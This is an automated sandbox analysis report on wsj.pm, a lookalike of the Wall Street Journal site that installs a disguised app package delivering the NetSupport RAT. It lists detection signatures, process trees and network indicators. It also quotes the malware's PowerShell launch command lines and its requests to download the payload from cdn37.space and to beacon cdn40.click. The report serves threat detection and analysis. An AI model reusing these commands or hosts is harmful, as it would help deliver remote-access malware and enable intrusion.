Windows Analysis Report
http://wsj.pm

Overview

General Information

Sample URL:http://wsj.pm
Analysis ID:1431705
Infos:

Detection

NetSupport RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Yara detected Powershell decode and execute
Contains functionality to detect sleep reduction / modifications
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Powershell drops PE file
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to open files direct via NTFS file id
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potentially Suspicious Windows App Activity
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://wsj.pm/ MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 6544 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2012,i,2892533121597599651,11552435548397906284,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • AppInstaller.exe (PID: 8144 cmdline: "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe" -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca MD5: A313FDADDB051A471645685386471EE2)
  • AppInstallerFullTrustAppServiceClient.exe (PID: 6156 cmdline: "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe" /InvokerPRAID: App GroupPolicy MD5: 2FEB69B26AB8966F050BA56641E8438A)
  • PsfLauncher64.exe (PID: 720 cmdline: "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe" MD5: C55F8E39801444DEBA32F5B94B5F1EB8)
    • PsfRunDll64.exe (PID: 1160 cmdline: "PsfRunDll64.exe" MD5: 8466F69926A22670DCF6515A4FC3C054)
    • powershell.exe (PID: 2360 cmdline: Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2564 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 7788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 4808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • client32.exe (PID: 7408 cmdline: "C:\ProgramData\netsupport\client\client32.exe" MD5: 9497AECE91E1CCC495CA26AE284600B9)
        • chrome.exe (PID: 7828 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.wsj.com/ MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
          • chrome.exe (PID: 3752 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=404 --field-trial-handle=1996,i,16757572502617297566,4553058767684910018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • rundll32.exe (PID: 7276 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • AppInstaller.exe (PID: 1592 cmdline: "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe" -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca MD5: A313FDADDB051A471645685386471EE2)
  • AppInstallerFullTrustAppServiceClient.exe (PID: 3356 cmdline: "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe" /InvokerPRAID: App GroupPolicy MD5: 2FEB69B26AB8966F050BA56641E8438A)
  • PsfLauncher64.exe (PID: 4768 cmdline: "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe" MD5: C55F8E39801444DEBA32F5B94B5F1EB8)
    • PsfRunDll64.exe (PID: 6400 cmdline: "PsfRunDll64.exe" MD5: 8466F69926A22670DCF6515A4FC3C054)
    • powershell.exe (PID: 3784 cmdline: Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\ProgramData\netsupport\client\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\ProgramData\netsupport\client\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\ProgramData\netsupport\client\client32.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\ProgramData\netsupport\client\HTCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\ProgramData\netsupport\client\AudioCapture.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security

Source | Rule | Description | Author | Strings
0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
00000020.00000003.1941488421.00000000008BD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
00000020.00000002.2526275885.000000000270C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security

Source | Rule | Description | Author | Strings
32.0.client32.exe.400000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
32.2.client32.exe.6c1b0000.4.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
32.2.client32.exe.74670000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
26.2.powershell.exe.23162f37328.2.raw.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
26.2.powershell.exe.23162f2d0d8.4.raw.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security

Source | Rule | Description | Author | Strings
amsi64_2564.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security
amsi64_7788.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security
amsi64_7788.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
                                    • 0x5b6:$b2: ::FromBase64String(
                                    • 0x94a:$b2: ::FromBase64String(
                                    • 0xd99:$b2: ::FromBase64String(
                                    • 0x1472:$b2: ::FromBase64String(
                                    • 0x298:$s1: -join
                                    • 0xd9ac:$s1: -join
                                    • 0x7158:$s4: +=
                                    • 0x721a:$s4: +=
                                    • 0xb441:$s4: +=
                                    • 0xd55e:$s4: +=
                                    • 0xd848:$s4: +=
                                    • 0xd98e:$s4: +=
                                    • 0x1b083:$s4: +=
                                    • 0x1b187:$s4: +=
                                    • 0x1e5e3:$s4: +=
                                    • 0x1ecc3:$s4: +=
                                    • 0x1f179:$s4: +=
                                    • 0x1f1ce:$s4: +=
                                    • 0x1f442:$s4: +=
                                    • 0x1f471:$s4: +=
                                    • 0x1f9b9:$s4: +=

                                    System Summary

                                    Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7788, TargetFilename: C:\ProgramData\netsupport\client\AudioCapture.dll
                                    Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'", CommandLine: Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe" , ParentImage: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe, ParentProcessId: 720, ParentProcessName: PsfLauncher64.exe, ProcessCommandLine: Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'", ProcessId: 2360, ProcessName: powershell.exe
                                    Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'", CommandLine: Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe" , ParentImage: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe, ParentProcessId: 720, ParentProcessName: PsfLauncher64.exe, ProcessCommandLine: Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'", ProcessId: 2360, ProcessName: powershell.exe
                                    Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
                                    04/25/24-16:59:39.263956 | 2052014 | 49799 | 443 | TCP | A Network Trojan was detected
                                    04/25/24-16:59:38.283783 | 2052014 | 49798 | 443 | TCP | A Network Trojan was detected
                                    04/25/24-16:59:38.117965 | 2052006 | 53350 | 53 | UDP | A Network Trojan was detected

                                    AV Detection

                                    Source: http://pesterbdd.com/images/Pester.png, URL Reputation: Label: malware
                                    Source: http://pesterbdd.com/images/Pester.png8, Avira URL Cloud: Label: malware
                                    Source: cdn40.click, Virustotal: Detection: 5%
                                    Source: http://pesterbdd.com/images/Pester.png8, Virustotal: Detection: 11%
                                    Source: C:\ProgramData\netsupport\client\client32.exe, Code function: 32_2_110AC600 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,32_2_110AC600
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\ProgramData\netsupport\client\msvcr100.dll
                                    Source: unknown, HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49780 version: TLS 1.2
                                    Source: unknown, HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49784 version: TLS 1.2
                                    Source: unknown, HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49786 version: TLS 1.2
                                    Source: unknown, HTTPS traffic detected: 40.126.28.14:443 -> 192.168.2.17:49785 version: TLS 1.2
                                    Source: unknown, HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49787 version: TLS 1.2
                                    Source: unknown, HTTPS traffic detected: 13.107.21.200:443 -> 192.168.2.17:49788 version: TLS 1.2
                                    Source: unknown, HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49792 version: TLS 1.2
                                    Source: unknown, HTTPS traffic detected: 23.133.88.190:443 -> 192.168.2.17:49797 version: TLS 1.2
                                    Source: unknown, HTTPS traffic detected: 86.104.72.157:443 -> 192.168.2.17:49798 version: TLS 1.2
                                    Source: unknown, HTTPS traffic detected: 23.133.88.190:443 -> 192.168.2.17:49807 version: TLS 1.2
                                    Source: Binary string: D:\a\1\s\x64\Release\PsfLauncher64.pdb source: PsfLauncher64.exe, 00000014.00000000.1745032807.00007FF6C367E000.00000002.00000001.01000000.0000000E.sdmp
                                    Source: Binary string: D:\a\1\s\x64\Release\PsfRuntime64.pdb source: PsfRunDll64.exe, 00000016.00000002.1749156584.00007FFA1B0EF000.00000002.00000001.01000000.0000000F.sdmp
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2653892978.000000006C1B2000.00000002.00000001.01000000.00000019.sdmp, PCICHEK.DLL.26.dr
                                    Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 0000001A.00000002.1968531120.00000231631AF000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000020.00000002.2639330298.000000006C0F1000.00000020.00000001.01000000.0000001A.sdmp, msvcr100.dll.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.26.dr
                                    Source: Binary string: client32_ctr.pdb0\1100\client32\Release\client32_ctr.pdbP source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
                                    Source: Binary string: client32_ctr.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdbP source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2654970934.0000000074675000.00000002.00000001.01000000.00000018.sdmp, pcicapi.dll.26.dr
                                    Source: Binary string: D:\a\1\s\x64\Release\PsfRunDll64.pdb source: PsfRunDll64.exe, 00000016.00000000.1747207751.00007FF695D50000.00000002.00000001.01000000.00000010.sdmp
                                    Source: Binary string: 0\1100\client32\Release\client32_ctr.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdb source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr
                                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000001A.00000002.2187481682.00000231793A5000.00000004.00000020.00020000.00000000.sdmp
                                    Source: C:\ProgramData\netsupport\client\client32.exe, Code function: 32_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,32_2_1102D1B3
                                    Source: C:\ProgramData\netsupport\client\client32.exe, Code function: 32_2_11069760 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,32_2_11069760
                                    Source: C:\ProgramData\netsupport\client\client32.exe, Code function: 32_2_11123690 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,32_2_11123690
                                    Source: C:\ProgramData\netsupport\client\client32.exe, Code function: 32_2_11108090 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,32_2_11108090
                                    Source: C:\ProgramData\netsupport\client\client32.exe, Code function: 32_2_110BC0E0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,32_2_110BC0E0
                                    Source: C:\ProgramData\netsupport\client\client32.exe, Code function: 32_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,32_2_1102CE84
                                    Source: C:\ProgramData\netsupport\client\client32.exe, Code function: 32_2_11064EF0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,32_2_11064EF0

                                    Networking

                                    Source: Traffic, Snort IDS: 2052006 ET TROJAN Suspected FIN7 Related domain in DNS Lookup (cdn37 .space) 192.168.2.17:53350 -> 1.1.1.1:53
                                    Source: Traffic, Snort IDS: 2052014 ET TROJAN Suspected Fin7 Related Domain (cdn37 .space) in TLS SNI 192.168.2.17:49798 -> 86.104.72.157:443
                                    Source: Traffic, Snort IDS: 2052014 ET TROJAN Suspected Fin7 Related Domain (cdn37 .space) in TLS SNI 192.168.2.17:49799 -> 86.104.72.157:443
                                    Source: global traffic, HTTP traffic detected: GET /ab HTTP/1.1; Host: evoke-windowsservices-tas.msedge.net; Cache-Control: no-store, no-cache; X-PHOTOS-CALLERID: 9NMPJ99VJBWV; X-EVOKE-RING: ; X-WINNEXT-RING: Public; X-WINNEXT-TELEMETRYLEVEL: Basic; X-WINNEXT-OSVERSION: 10.0.19045.0; X-WINNEXT-APPVERSION: 1.23082.131.0; X-WINNEXT-PLATFORM: Desktop; X-WINNEXT-CANTAILOR: False; X-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}; X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=; If-None-Match: 2056388360_-1434155563; Accept-Encoding: gzip, deflate, br
                                    Source: global traffic, HTTP traffic detected: GET /files/netsupport25.zip HTTP/1.1; Host: cdn37.space
                                    Source: global traffic, HTTP traffic detected: GET /223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0?zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c&yfDMDjOpXByWOOUikqckBA=Cannot%20bind%20argument%20to%20parameter%20'Command'%20because%20it%20is%20an%20empty%20string. HTTP/1.1; Host: cdn40.click
                                    Source: global traffic, HTTP traffic detected: GET /974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsp&ahsdjkasjkdh=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c HTTP/1.1; Host: cdn40.click
                                    Source: global traffic, HTTP traffic detected: GET /location/loca.asp HTTP/1.1; Host: geo.netsupportsoftware.com; Connection: Keep-Alive; Cache-Control: no-cache
                                    Source: unknown, TCP traffic detected without corresponding DNS query: 204.79.197.200
                                    Source: unknown, TCP traffic detected without corresponding DNS query: 20.114.59.183
                                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                    Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
                                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.28.14
                                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: wsj.pmConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /css/footer.css HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/retina/Retina-Book.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/retina/Retina-Light.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
